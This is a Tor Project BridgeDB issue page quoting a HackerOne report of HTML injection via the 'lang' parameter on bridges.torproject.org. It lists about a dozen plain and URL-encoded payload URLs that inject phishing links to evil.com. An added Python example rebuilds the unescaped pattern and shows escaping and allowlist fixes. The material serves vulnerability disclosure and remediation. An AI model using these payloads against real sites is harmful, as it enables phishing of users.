BridgeDB (The Tor Project / Anti-censorship), issue #40014, Closed
Created May 31, 2021 by Cecylia Bocovich (@cohosh, Owner)

HTML injection vulnerability with lang parameter

We just got the following email through HackerOne:

Hello Sir,

I want to report the vulnerability and possible bypass methods... I
found on your site https://torproject.org

This vulnerability is much more HTML injection and possible XSS that may
be used by hackers in order to harm others
for phishing purposes...

URL: https://bridges.torproject.org/options?lang=anonyks

This is the vulnerable URL where I found my vulnerability;
the parameter is lang= (any string) [here AnonyKs is used].
Then the payload used is: "><h1>Giveaway:-P <a href="//evil.am">CLICK ME</a> </h1>

So the URL becomes:
URL: https://bridges.torproject.org/options?lang=anonyks"><h1>Giveaway:-P <a href="//evil.com">CLICK ME</a> </h1>

Copy the URL and paste it in the browser
and click on CLICK ME [there 'click me' is shown in three different
places and each redirects to evil.com]

You may fix the above vulnerability but still there can be other ways
that a hacker can use,
so...
Now regarding bypasses/other possible ways:
URL: https://bridges.torproject.org/options?lang=anonyks"><h1>Giveaway:-P <a href="%2f%2fevil.com">CLICK ME</a> </h1>
URL: https://bridges.torproject.org/options?lang=anonyks"><h1>Giveaway:-P <a href="http://evil.com">CLICK ME</a> </h1>

Now encoding,

URL: https://bridges.torproject.org/options?lang=anonyks%22%3E%3Ch1%3EGiveaway:P%20%3CA%20HREF=%22http://evil.com/%22%3EClickMe%3C/A%3E%20%3C/h1%3E
URL: https://bridges.torproject.org/options?lang=anonyks%22%3E%3Ch1%3EGiveaway:P%20%3CA%20HREF=%22//evil.com/%22%3EClickMe%3C/A%3E%20%3C/h1%3E
URL: https://bridges.torproject.org/options?lang=anonyks%22%3E%3Ch1%3EGiveaway:P%20%3CA%20HREF=%22%2f%2fevil.com/%22%3EClickMe%3C/A%3E%20%3C/h1%3E

There are more ways; now they are without the <h1> HTML tag

URL: https://bridges.torproject.org/options?lang=anonyks"><a href="http://evil.com">Click Me</a>
URL: https://bridges.torproject.org/options?lang=anonyks"><a href="//evil.com">Click Me</a>

Now again encoding them,

URL: https://bridges.torproject.org/options?lang=anonyks%22%3E%3CA%20HREF=%22http://evil.com/%22%3EClickMe%3C/A%3E
URL: https://bridges.torproject.org/options?lang=anonyks%22%3E%3CA%20HREF=%22//evil.com/%22%3EClickMe%3C/A%3E

Impact

Altogether today I submitted 10 vulnerabilities with possible bypasses or
possible methods that an attacker can use for crime purposes.
So to sum up, all URLs are:
URL: https://bridges.torproject.org/options?lang=anonyks"><a href="//evil.com">Click Me</a>
URL: https://bridges.torproject.org/options?lang=anonyks"><a href="http://evil.com">Click Me</a>
URL: https://bridges.torproject.org/options?lang=anonyks"><h1>Giveaway:-P <a href="%2f%2fevil.com">CLICK ME</a> </h1>
URL: https://bridges.torproject.org/options?lang=anonyks"><h1>Giveaway:-P <a href="//evil.com">CLICK ME</a> </h1>
URL: https://bridges.torproject.org/options?lang=anonyks"><h1>Giveaway:-P <a href="http://evil.com">CLICK ME</a> </h1>
URL: https://bridges.torproject.org/options?lang=anonyks%22%3E%3CA%20HREF=%22//evil.com/%22%3EClickMe%3C/A%3E
URL: https://bridges.torproject.org/options?lang=anonyks%22%3E%3CA%20HREF=%22http://evil.com/%22%3EClickMe%3C/A%3E
URL: https://bridges.torproject.org/options?lang=anonyks%22%3E%3Ch1%3EGiveaway:P%20%3CA%20HREF=%22//evil.com/%22%3EClickMe%3C/A%3E%20%3C/h1%3E
URL: https://bridges.torproject.org/options?lang=anonyks%22%3E%3Ch1%3EGiveaway:P%20%3CA%20HREF=%22http://evil.com/%22%3EClickMe%3C/A%3E%20%3C/h1%3E
URL: https://bridges.torproject.org/options?lang=anonyks%22%3E%3Ch1%3EGiveaway:P%20%3CA%20HREF=%22%2f%2fevil.com/%22%3EClickMe%3C/A%3E%20%3C/h1%3E

Impact:
The vulnerability allows a malicious user to inject HTML tags and execute
JavaScript, which could lead to stealing the user's session, performing CSRF
attacks or opening a phishing page.

Broadly,

When the input fields are not properly sanitized in a webpage, this HTML
injection vulnerability might sometimes lead to Cross-Site Scripting (XSS)
or Server-Side Request Forgery (SSRF) attacks.
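Added example, not code from BridgeDB and not part of the reporter's email: a minimal Python reconstruction of the pattern the report describes (a `lang` query value copied into HTML attributes without escaping or validation), beside two fixes. The template, the allowlist of language codes and every function name below are assumptions made for the illustration; the two payload URLs in the demo are the first plain and the first percent-encoded one from the email above.

```python
# Added example, not BridgeDB's own code and not part of the reporter's email:
# a minimal reconstruction of the reflected-parameter pattern behind the
# report (a `lang` query value copied into markup without escaping or
# validation), next to two fixes.  The template, the allowlist and every
# function name here are assumptions made for this illustration.
import html
from urllib.parse import parse_qs, urlparse

# Constructed allowlist standing in for the languages a site actually ships.
SUPPORTED_LANGS = frozenset({"en", "de", "fa", "fr", "ru", "zh_CN"})
DEFAULT_LANG = "en"

# Hypothetical page that reflects the language code in three attribute
# contexts; reflecting it several times is why an injected link can show
# up more than once on a single page.
TEMPLATE = (
    '<html lang="{lang}"><body>'
    '<input type="hidden" name="lang" value="{lang}">'
    '<a href="/options?lang={lang}">Options</a>'
    "</body></html>"
)


def lang_from_url(url: str) -> str:
    """Return the lang query value the way a server sees it (percent-decoded).

    The plain and the %xx-encoded URLs in the report decode to the same
    kind of payload before any handler runs, so the encoded forms are the
    same bug reached through a different spelling, not separate bypasses.
    """
    params = parse_qs(urlparse(url).query, keep_blank_values=True)
    return params.get("lang", [""])[0]


def render_unsafe(lang: str) -> str:
    """Vulnerable pattern: the raw query value is substituted into markup."""
    return TEMPLATE.format(lang=lang)


def render_escaped(lang: str) -> str:
    """Fix 1: escape for the HTML attribute context.

    quote=True matters: the payload starts with a double quote to close
    the attribute it lands in, so escaping only < > & is not enough.
    """
    return TEMPLATE.format(lang=html.escape(lang, quote=True))


def render_allowlisted(lang: str) -> str:
    """Fix 2 (preferred for a language code): anything not in the catalogue
    is replaced by the default before it reaches the template, and the
    value is still escaped on output."""
    if lang not in SUPPORTED_LANGS:
        lang = DEFAULT_LANG
    return render_escaped(lang)


def injected_markup_present(page: str) -> bool:
    """Crude oracle for the report's payloads: did an attacker tag survive?"""
    lowered = page.lower()
    return (
        "<h1>" in lowered
        or 'href="//evil.com' in lowered
        or 'href="http://evil.com' in lowered
    )


if __name__ == "__main__":
    # The first plain and the first percent-encoded URL from the report.
    reported = (
        'https://bridges.torproject.org/options?lang=anonyks"><h1>Giveaway:-P '
        '<a href="//evil.com">CLICK ME</a> </h1>',
        "https://bridges.torproject.org/options?lang=anonyks%22%3E%3CA%20HREF="
        "%22http://evil.com/%22%3EClickMe%3C/A%3E",
    )
    for url in reported:
        payload = lang_from_url(url)
        print("payload       :", payload)
        print("unsafe leaks  :", injected_markup_present(render_unsafe(payload)))
        print("escaped leaks :", injected_markup_present(render_escaped(payload)))
        print("allowlisted   :", render_allowlisted(payload) == render_escaped(DEFAULT_LANG))
```

Run it directly to see the unsafe render carry the injected anchor through while both fixes keep it inert. For a language selector the allowlist is the fix to prefer: the legitimate value space is small and known, so an unexpected value can simply fall back to the default, and output escaping then guards against any other reflection path.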